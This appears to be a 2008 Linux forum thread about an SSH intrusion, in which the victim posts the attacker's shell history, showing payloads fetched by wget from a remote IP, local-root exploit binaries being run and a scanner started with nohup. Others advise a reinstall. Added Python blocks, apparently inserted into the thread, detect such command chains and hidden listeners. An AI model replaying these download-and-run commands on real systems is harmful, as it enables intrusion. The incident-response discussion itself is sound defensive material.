
#1 2008-11-24 09:42:21

matto
Member
From: Münster/germany
Registered: 2004-06-03
Posts: 88

probably hacked

Hi!
I use icecast+mpd to stream music to my workplace. To get that stream I use dyndns.
I also installed and configured sshd for remote control and vsftpd via xinetd. Nothing bad so far, I think.

The bad thing: I've set up some unprivileged users (username=password), very stupid I know,
to give some friends cheap and easy FTP access to store some stuff (a presentation for university, e.g.).
And those users have SSH access too.

A few days ago I noticed, due to CPU usage, that something's not right. I saw somebody logged into my machine, stopped sshd and
all other network-related things. The user ran some scripts and I stopped them.
Mainly some bash scripts using pscan2 (maybe this: http://packetstormsecurity.org/UNIX/scanners/pscan2.c ).
All files were in the user's home dir.
clamav, rkhunter and chkrootkit were only complaining about those files in the user's home dir (linux.rst.b).
nmap tells me that no port is open when my services are down.

Now I am not sure if I am infected or if I was fast enough to stop that exploit (??).

Nor do I know what I should do now.

Maybe someone can check my machine? I really don't want to set it up again and hope that's not the only chance to sleep well again.

Any advice? Searching the web tells me that those tools that were used are about 6 years old.
I can put all that into an archive and upload it to rapidshare or so, if wanted.

Sorry for my bad English.
Greetings, matto


// DAMNiAM //


#2 2008-11-24 10:18:58

fukawi2
Ex-Administratorino
From: .vic.au
Registered: 2007-09-28
Posts: 6,224

Re: probably hacked

By the sounds of it, you're probably root-kitted. Once you've been root-kitted, you can't really be 100% sure if it's been cleaned. Root kits are designed to hide themselves, by modifying things like ps and netstat etc.

Your safest option is to reinstall I'm afraid.


#3 2008-11-24 10:26:17

ArchArael
Member
Registered: 2005-06-14
Posts: 504

Re: probably hacked

Maybe you could fix things, but if I were in your place I would reinstall everything. At least just to sleep well again.


#4 2008-11-24 11:42:22

thomasknowles
Member
From: England
Registered: 2008-11-23
Posts: 38

Re: probably hacked

If you noticed that the ps scan was running at 100% before you killed it, then you are probably OK. But like fukawi2 and ArchArael suggest, it's really hard to be sure.


#5 2008-11-24 12:49:42

rson451
Member
From: Annapolis, MD USA
Registered: 2007-04-15
Posts: 1,233

Re: probably hacked

I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?


archlinux - please read this and this — twice — then ask questions.
--
http://rsontech.net | http://github.com/rson


#6 2008-11-24 14:31:22

matto
Member
From: Münster/germany
Registered: 2004-06-03
Posts: 88

Re: probably hacked

Hi,
thanks for your quick reply!
If I set up my machine again, can I keep my configuration files?
Are my private files .. infected or whatever with anything?

I set up my partitions as follows:

/dev/hdc2 on / type jfs (rw)
/dev/hdc5 on /var type jfs (rw)
/dev/hdc6 on /home type jfs (rw)           // I can leave this unchanged, right?
/dev/hdc7 on /mnt/mukku type jfs (rw)    // music
/dev/hdc8 on /mnt/zoix type jfs (rw)       // backups, other stuff

A general question:
the attacker tried to get root using 2 exploits.
What if these exploits don't work? Was it possible for him to do any damage?
Can I check this using the same exploits?
Has anyone here ever tried or heard of those exploits?
Anything to think about before I try it?

Here is the relevant history part, up to where I stopped all connections:

   75  ps x
   76  w
   77  uname -a
   78  cat /proc/cpuinfo
   79  passwd 
   80  ps x
   81  passwd
   82  id
   83  ifconfg
   84  ifconfig
   85  cat /proc/cpuinfo
   86  mkdir .cornd
   87  wget ftp://89.39.167.131/k/expl2008.zip
   88  unzip expl2008.zip 
   89  rm -rf expl2008.zip 
   90  ./diane_lane
   91  ./jessica_biel
   92  ls -l
   93  cd .cornd
   94  rm -rf *
   95  ls la
   96  w
   97  uptime
   98  cat /etc/issue
   99  uname -a
  100  ps -afx
  101  wget ftp://89.39.167.131/k/vip.tgz
  102  tar zxvf vip.tgz
  103  rm -rf vip.tgz
  104  cd vip
  105  chmod +x *
  106  nohup ./start 92 >> /dev/null &
  107  rm -rf vuln.txt
  108  ps -x

I still have all these files, but moved them to another dir (done as the "hacked" user).

Greetings, matto


// DAMNiAM //
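As an added example (not part of matto's post or of any tool named in the thread), here is a small Python triage script that flags the stages visible in a shell history like the one above: fetch an archive from a remote host, unpack it, delete the archive, run the payload and background it with nohup. The sample history is constructed to mirror the posted excerpt, with a documentation-range address (192.0.2.10) in place of the real host.

```python
import re

# Constructed sample modelled on the history quoted above; the host is a
# documentation-range placeholder (RFC 5737), not the address from the post.
SAMPLE_HISTORY = """\
   85  cat /proc/cpuinfo
   86  mkdir .cornd
   87  wget ftp://192.0.2.10/k/expl2008.zip
   88  unzip expl2008.zip
   89  rm -rf expl2008.zip
   90  ./diane_lane
  102  tar zxvf vip.tgz
  105  chmod +x *
  106  nohup ./start 92 >> /dev/null &
"""

# (tag, pattern): each rule marks one stage of a download-and-execute chain.
RULES = [
    ("download",   re.compile(r"\b(wget|curl|ftp|tftp)\b\s+\S*://")),
    ("unpack",     re.compile(r"\b(unzip|gunzip|tar\s+-?\S*[xz])")),
    ("cleanup",    re.compile(r"\brm\s+-rf?\s+\S+\.(zip|tgz|tar\.gz|txt)\b")),
    ("hidden-dir", re.compile(r"\b(mkdir|cd)\s+\.[A-Za-z0-9_-]+")),
    ("exec-local", re.compile(r"(^|\s)\./\S+")),
    ("persist",    re.compile(r"\bnohup\b.*&\s*$")),
    ("chmod",      re.compile(r"\bchmod\s+\+x\b")),
]

def triage_history(text):
    """Return [(history_number, tags, command)] for every line hitting a rule."""
    hits = []
    for raw in text.splitlines():
        m = re.match(r"\s*(\d+)\s+(.*)$", raw)      # `history` output: number, command
        if not m:
            continue
        num, cmd = int(m.group(1)), m.group(2).rstrip()
        tags = [tag for tag, rx in RULES if rx.search(cmd)]
        if tags:
            hits.append((num, tags, cmd))
    return hits

def has_full_chain(hits):
    """True when download, local execution and nohup persistence appear in that order."""
    order = [t for _, tags, _ in hits for t in tags]
    pos = [order.index(s) if s in order else -1 for s in ("download", "exec-local", "persist")]
    return all(p >= 0 for p in pos) and pos == sorted(pos)

if __name__ == "__main__":
    for num, tags, cmd in triage_history(SAMPLE_HISTORY):
        print(f"{num:5d}  {','.join(tags):20s} {cmd}")
```

Run it over a recovered ~/.bash_history (or the output of `history`) to get the suspicious lines grouped by stage; an untouched history number sequence with a full chain present is a strong sign the session went beyond reconnaissance.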


#7 2008-11-24 19:14:22

matto
Member
From: Münster/germany
Registered: 2004-06-03
Posts: 88

Re: probably hacked

Hi again!

@rson451:
Good idea, I did that right now. I downloaded "grml", which looked pretty good to me.
Same results there.

I've just one last question. If there is any backdoor or IRC bot installed, will I see it listening with nmap?

Greetings, matto


// DAMNiAM //


#8 2008-11-24 21:38:29

fukawi2
Ex-Administratorino
From: .vic.au
Registered: 2007-09-28
Posts: 6,224

Re: probably hacked

rson451 wrote:

I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?

In theory yes, however it's still difficult to be 100% sure... IMHO, better safe than sorry...

matto wrote:

If I set up my machine again, can I keep my configuration files?
Are my private files .. infected or whatever with anything?

In theory, they shouldn't be infected, but it's hard to say... I would back up your home partition, then selectively restore your documents / music / etc. and skip any .files or .folders in case something has been hidden in there. It's unlikely they hid anything in non-hidden folders, as they have no way of knowing which folders you access regularly, which would mean you would see strange files immediately.

matto wrote:

Here is the relevant history part, up to where I stopped all connections:
<SNIP>
I still have all these files, but moved them to another dir (done as the "hacked" user).

That's interesting... I work in Network Security - would you mind tar'ing that up and sending to me? I'd love to have a closer look...

matto wrote:

I've just one last question. If there is any backdoor or IRC bot installed, will I see it listening with nmap?

If you're *SURE* your netstat hasn't been modified, then it will show... However if the root kit has modified netstat, then it will deliberately hide it from you.


#9 2008-11-24 22:03:44

wuischke
Member
From: Suisse Romande
Registered: 2007-01-06
Posts: 630

Re: probably hacked

No, nmap will not show you a hidden backdoor in all cases when you do a scan. If one uses for instance port knocking, nmap won't show you any activity. In general, however, this is rather improbable.
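fukawi2's point about a modified netstat and wuischke's about nmap come down to the same thing: a single userland tool can lie, so compare it against another source. As an added example (not from the thread), the Python below parses the kernel's /proc/net/tcp table directly and reports any listening socket that a `netstat -tln` listing omits; both inputs are constructed samples, with a hypothetically trojaned netstat that hides port 6667.

```python
import socket
import struct

# Constructed /proc/net/tcp excerpt in the real column layout: sshd on :22 (0x0016),
# icecast on :8000 (0x1F40), an extra listener on :6667 (0x1A0B) owned by uid 1001,
# plus one established client connection.  Column "st" 0A means TCP_LISTEN.
SAMPLE_PROC_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 00000000:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000    85        0 2345 1 0000000000000000 100 0 0 10 0
   2: 00000000:1A0B 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 3456 1 0000000000000000 100 0 0 10 0
   3: 0100007F:B2E4 0100007F:1F40 01 00000000:00000000 00:00000000 00000000  1000        0 4567 1 0000000000000000 20 4 30 10 -1
"""
# Constructed `netstat -tln` output from a hypothetically trojaned netstat that omits :6667.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN
"""
TCP_LISTEN = 0x0A

def decode_v4(hexaddr):
    """'0100007F:0016' -> ('127.0.0.1', 22); /proc writes the IPv4 word in host order (little-endian on x86)."""
    ip_hex, port_hex = hexaddr.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)

def proc_listeners(proc_text):
    """Return {(ip, port, uid)} for every socket the kernel reports in TCP_LISTEN."""
    found = set()
    for line in proc_text.splitlines()[1:]:          # skip the column header
        f = line.split()
        if len(f) >= 8 and int(f[3], 16) == TCP_LISTEN:
            ip, port = decode_v4(f[1])
            found.add((ip, port, int(f[7])))
    return found

def netstat_listeners(netstat_text):
    """Return {(ip, port)} from `netstat -tln` style output (what the userland tool claims)."""
    found = set()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].startswith("tcp") and f[-1] == "LISTEN":
            ip, port = f[3].rsplit(":", 1)
            found.add((ip, int(port)))
    return found

def hidden_listeners(proc_text, netstat_text):
    """Listeners present in the kernel table but missing from netstat: a red flag."""
    seen = netstat_listeners(netstat_text)
    return sorted(s for s in proc_listeners(proc_text) if (s[0], s[1]) not in seen)
```

On a live system pass `open("/proc/net/tcp").read()` (and likewise /proc/net/tcp6) together with the real `netstat -tln` output to `hidden_listeners`; a kernel-level rootkit can falsify /proc as well, which is why the thread's advice to scan from a live CD, or simply reinstall, still stands.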


#10 2008-11-24 23:14:58

Allan
Pacman
From: Brisbane, AU
Registered: 2007-06-09
Posts: 11,390

Re: probably hacked

matto wrote:

here is the relevant history part, till i stopped all connections

   91  ./jessica_biel

jessica_biel is that kernel vmsplice exploit to get root powers that was found a couple of months back.  That would have failed unless your system was very out of date.

You should google the other programs and see if you were vulnerable to any of them.

Edit: diane_lane is the same exploit as jessica_biel


#11 2008-11-25 00:09:42

Ruckus
Member
Registered: 2007-02-17
Posts: 204

Re: probably hacked

I would do a complete reinstall.

I use the same basic setup as you outlined above, except the only ports open to the public are sshd (22) and http (80), with root login disabled. To access everything else I use SSH tunnels. I tunnel Icecast for music and Samba for file access over SSH. Since I'm using Windows I use a modified PuTTY that stores everything on a flash drive and attempts to reconnect on disconnect; the minimize-to-tray feature is really nice as well.

I would not use FTP for anything. I know it can be made secure, but really SSHFS for Linux is a lot more secure and a lot easier to set up. For non-Linux users Samba is the way to go; for remote access I tunnel it over SSH, see http://www.blisstonia.com/eolson/notes/smboverssh.php. Also, for most things like x11vnc/vncservers, be sure they only accept connections from localhost (your SSH tunnel).

Edit: When I'm at work i also use portable pidgin and portable Firefox to chat/browse the net. Check out dynamic port forwarding to tunnel all Firefox/pidgin traffic through your home computer to avoid firewalls and the local sys admins snooping on things.

Edit2: Here you can see my flash drive with all of my portable applications set up, and the modified PuTTY setup with different sessions saved.

Last edited by Ruckus (2008-11-25 00:17:02)
